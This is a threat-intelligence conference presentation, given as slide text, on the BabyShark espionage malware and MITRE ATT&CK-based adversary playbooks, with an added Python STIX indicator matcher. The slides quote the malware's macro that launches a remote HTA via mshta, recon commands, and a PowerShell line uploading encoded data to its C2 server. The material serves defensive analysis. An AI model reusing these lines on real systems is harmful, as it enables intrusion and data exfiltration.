
The adversary playbook - the tools, techniques and procedures used by threat actors


A presentation at the Jisc security conference 2019 by Alex Hinchcliffe, threat intelligence analyst, Palo Alto Networks.


  1. Unit 42 Adversary Playbooks. Alex Hinchliffe, Threat Intelligence Analyst
  2. Agenda • Introductions • Information sharing partnerships • Case study: BabyShark • Adversary Playbooks
  3. LIFE THE UNIVERSE EVERYTHING
  4. OUR MISSION: ANALYZE THE DATA AVAILABLE TO PALO ALTO NETWORKS TO IDENTIFY ADVERSARIES, THEIR MOTIVATIONS, RESOURCES, AND TACTICS TO BETTER UNDERSTAND THE THREATS OUR CUSTOMERS FACE. https://unit42.paloaltonetworks.com @Unit42_Intel
  5. Cyber Threat Alliance (Charter Members, Affiliate Members, Contributing Members). 1. To share threat information in order to improve defenses against advanced cyber adversaries across member organizations and their customers. 2. To advance the cybersecurity of critical information technology infrastructures. 3. To increase the security, availability, integrity and efficiency of information systems.
  6. Mission… “Foster relationships with SOC, IR and CERT teams from customers, partners and organisations in EMEA to collaborate and share threat information.” 60+ Members… Threat Information Sharing Program (TISP)
  7. Case Study: BabyShark
  8. BabyShark “Top Trumps”: Language: VBS. Debut year: 2018. Key interests: Universities and think-tanks. Hobbies: Espionage (related to nuclear security and Korean peninsula). Best friends: KimJongRAT and STOLEN PENCIL. Works for: Kimsuky Group (aka Velvet Chollima, THALLIUM, Nickel Foxcroft). Special powers: Cryptocurrency mining. Family members: 4
  9. ATTACK LIFE CYCLE: RECON, WEAPONIZATION, DELIVERY, EXPLOITATION, INSTALLATION, COMMAND & CONTROL, OBJECTIVE
  10. WEAPONIZATION: Excel Macro-Enabled Add-In file “Hamre-re-NK-deterrence-CWIR-19-Nov18.xlam”
  11. DELIVERY
  12. EXPLOITATION
      Sub AutoOpen()
          Shell ("mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta")
      End Sub
  13. INSTALLATION
      HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings, value: 1
      whoami; hostname; ipconfig /all; net user; dir "%programfiles%"; "%programfiles% (x86)"; ...; tasklist; ver; set; reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
  14. COMMAND & CONTROL
      retu=wShell.run("certutil -f -encode """&ttmp&""" """&ttmp1&"""",0,true)
      retu=wShell.run("powershell.exe (New-Object System.Net.WebClient).UploadFile('https://tdalpacafarm[.]com/files/kr/contents/upload.php','"&ttmp1&"');del """&ttmp1&""";del """&ttmp&"""",0,true)
  15. OBJECTIVE • Espionage related to nuclear security; • Espionage related to Korean peninsula’s national security issues; • Financial gain with focus on the cryptocurrency. Commands (name: description): getfiles: Archive all files in the BabyShark base path as a ZIP archive, then upload to the C2. exe_down: Download further payloads. redirect_vbs: Possible C2 path change.
  16. OBJECTIVE. Commands (name: description): keyhook: Start key loggers implemented using PowerShell (available on GitHub) or custom C#. dir list: Collect host information using: whoami, hostname, ipconfig, net user, arp -a, dir (various), vol and tasklist. power com: Load DLL component. exe del: Clean up all files associated with secondary payload execution. execute: Execute payloads.
  17. Adversary Playbooks
  18. ADVERSARY PLAYBOOK CONCEPT: An Adversary's Playbook is the organized collection of the Techniques, Tactics and Procedures (TTP) they employ when launching cyber-attacks. As adversaries do not share their playbooks with defenders, we must derive them through observations of live attacks, shared information and intelligence analysis.
  19. Deconstructing the Attack Life Cycle. COMMAND & CONTROL: Custom Command and Control, Fallback Channels, Data Encoding
  20. 2.0
  21. STIX 2.0: Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence. ATT&CK: MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior. ATTACK LIFE CYCLE: A linear, phase-based process an adversary must complete to successfully execute an attack. PLAYBOOKS: A method of organizing tactics, tools, and procedures adversaries used in a structured data format.
  22. ADVERSARY ATTACK LIFE CYCLE IDENTIFIED TACTICS INDICATORS PLAYBOOK PLAYS ATT&CK
  23. RECON: Identify business relationships
  24. INSTALLATION: Obfuscate or encrypt code; PowerShell; Scripting; mshta; Hidden Files and Directories; Logon Scripts. Indicator: windows-registry-key:key = 'HKCU\Software\Microsoft\Command Processor\AutoRun' AND windows-registry-key:values[*].data LIKE '%powershell.exe%mshta%.hta%'
  25. COMMAND & CONTROL: Standard Application Layer Protocol; Data Encoding; Remote File Copy. BabyShark uses HTTPS for C2. Indicator: domain-name:value = 'tdalpacafarm[.]com'
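Slides 24 and 25 express the playbook's indicators as STIX 2 comparison expressions (a registry-key pattern for the AutoRun persistence and a domain-name pattern for the C2 host), and slide 13 shows the VBAWarnings registry change that precedes them. The following is an added example, not code from the talk or from Unit 42's playbook viewer: a small evaluator that runs such indicator patterns over host observations a defender has already collected. It assumes only the subset of STIX patterning the slides use (`=` and `LIKE` comparisons joined by `AND`, one observed object at a time), case-insensitive matching because Windows registry paths and DNS names are case-insensitive, and that defanged values such as `tdalpacafarm[.]com` must be refanged before comparison. The VBAWarnings indicator and all sample observations are constructed here for illustration.

```python
import re
from typing import Any, Dict, Iterator, List, Tuple

# Added example: minimal evaluator for the STIX 2 comparison expressions the
# deck uses as playbook indicators. Assumption: only '=' and 'LIKE' comparisons
# joined by AND, evaluated against one observed object at a time.

# The first two patterns are quoted from the slides; the third is constructed
# here from the VBAWarnings=1 registry change shown on the INSTALLATION slide.
INDICATORS: Dict[str, str] = {
    "babyshark-autorun-persistence":
        "windows-registry-key:key = 'HKCU\\Software\\Microsoft\\Command Processor\\AutoRun' "
        "AND windows-registry-key:values[*].data LIKE '%powershell.exe%mshta%.hta%'",
    "babyshark-c2-domain":
        "domain-name:value = 'tdalpacafarm[.]com'",
    "excel-macro-warnings-disabled":          # constructed indicator
        "windows-registry-key:key = 'HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security' "
        "AND windows-registry-key:values[*].name = 'VBAWarnings' "
        "AND windows-registry-key:values[*].data = '1'",
}

# <object-type>:<property-path> <op> '<value>'
_COMPARISON = re.compile(
    r"^(?P<type>[a-z0-9-]+):(?P<path>[A-Za-z0-9_.\[\]*]+)\s+(?P<op>=|LIKE)\s+'(?P<value>.*)'$"
)


def refang(value: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' back into a matchable string."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def like_to_regex(like: str) -> re.Pattern:
    """Translate a STIX/SQL LIKE pattern (% = any run, _ = one char) into an anchored regex."""
    parts = []
    for ch in like:
        if ch == "%":
            parts.append(".*")
        elif ch == "_":
            parts.append(".")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE | re.DOTALL)


def resolve(obj: Any, path: str) -> Iterator[Any]:
    """Yield every value reachable through a STIX property path such as values[*].data."""
    head, _, rest = path.partition(".")
    wildcard = head.endswith("[*]")
    name = head[:-3] if wildcard else head
    if not isinstance(obj, dict) or name not in obj:
        return
    node = obj[name]
    candidates = node if wildcard and isinstance(node, list) else [node]
    for cand in candidates:
        if rest:
            yield from resolve(cand, rest)
        else:
            yield cand


def compare(observation: dict, comparison: str) -> bool:
    """Evaluate one '<type>:<path> <op> <value>' comparison against an observed object."""
    m = _COMPARISON.match(comparison.strip())
    if m is None:
        raise ValueError(f"unsupported comparison: {comparison!r}")
    if observation.get("type") != m["type"]:
        return False
    wanted = refang(m["value"])
    if m["op"] == "=":
        return any(str(v).lower() == wanted.lower() for v in resolve(observation, m["path"]))
    regex = like_to_regex(wanted)
    return any(regex.match(str(v)) for v in resolve(observation, m["path"]))


def matches(observation: dict, pattern: str) -> bool:
    """True when every AND-joined comparison of the pattern holds for the observation."""
    body = pattern.strip()
    if body.startswith("[") and body.endswith("]"):   # tolerate the bracketed STIX form
        body = body[1:-1]
    return all(compare(observation, c) for c in body.split(" AND "))


def scan(observations: List[dict], indicators: Dict[str, str] = INDICATORS) -> List[Tuple[int, str]]:
    """Return (observation index, indicator name) for every indicator that fires."""
    return [(i, name) for i, obs in enumerate(observations)
            for name, pat in indicators.items() if matches(obs, pat)]


# Constructed host observations: three that should fire and two that should not.
SAMPLE_OBSERVATIONS = [
    {"type": "windows-registry-key",
     "key": "HKCU\\Software\\Microsoft\\Command Processor\\AutoRun",
     "values": [{"name": "", "data": "powershell.exe -c mshta C:\\Users\\Public\\run.hta"}]},
    {"type": "windows-registry-key",
     "key": "HKCU\\Software\\Microsoft\\Command Processor\\AutoRun",
     "values": [{"name": "", "data": "doskey ls=dir"}]},      # benign AutoRun alias
    {"type": "domain-name", "value": "tdalpacafarm.com"},
    {"type": "domain-name", "value": "example.org"},
    {"type": "windows-registry-key",
     "key": "HKCU\\Software\\Microsoft\\Office\\14.0\\Excel\\Security",
     "values": [{"name": "VBAWarnings", "data": "1"}]},
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_OBSERVATIONS):
        print(f"observation {idx} matched {name}")
```

Two design points worth noting. A `values[*]` path is evaluated per comparison, so in the constructed VBAWarnings indicator the `name` and `data` clauses may in principle be satisfied by different values under the same key; tightening that requires the full STIX observation-expression semantics, which this toy omits. The refang step is the practical caveat: indicators are shared defanged, and a matcher that compares `tdalpacafarm[.]com` literally against DNS telemetry never fires. OASIS publishes a reference matcher (cti-pattern-matcher) that implements the complete pattern grammar for production use.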
  26. Campaign 1 Recon Weaponize Delivery Exploit Install C2 Act on Obj. Identify business relationships Acquire OSINT data sets and information Obtain templates/branding materials Acquire and/or use 3rd party infrastructure services Remote access tool development Install and configure hardware, network, and systems Obfuscate or encrypt code Obtain/re-use payloads Buy domain name Create custom payloads Conduct social engineering or HUMINT operation Spear phishing messages with malicious attachments Authorized user performs requested cyber action Hidden Files and Directories Process Injection Rundll32 Software Packing Scripting Remote File Copy Data Encoding Standard Application Layer Protocol Process Discovery Automated Collection Screen Capture Clipboard Data System Network Configuration Discovery File and Directory Discovery Logon Scripts Host-based hiding techniques Misattributable credentials Obtain/re-use payloads Buy domain name Create custom payloads Spear phishing messages with malicious attachments Authorized user performs requested cyber action Confirmation of launched compromise achieved Custom Cryptographic Protocol Standard Application Layer Protocol Commonly Used Port System Information Discovery Campaign 2
  28. How should people use this? Simulations, Ranges, Defence Evaluations, Cyber Threat Alliance
  29. Defence Priorities: Your Top 10 Adversaries → Distinct TTPs → Defences (Defence #1, Defence #2, Defence #3)
  30. https://pan-unit42.github.io/playbook_viewer/
  31. THANK YOU unit42.paloaltonetworks.com Twitter: @AlexHinchliffe, @Unit42_Intel
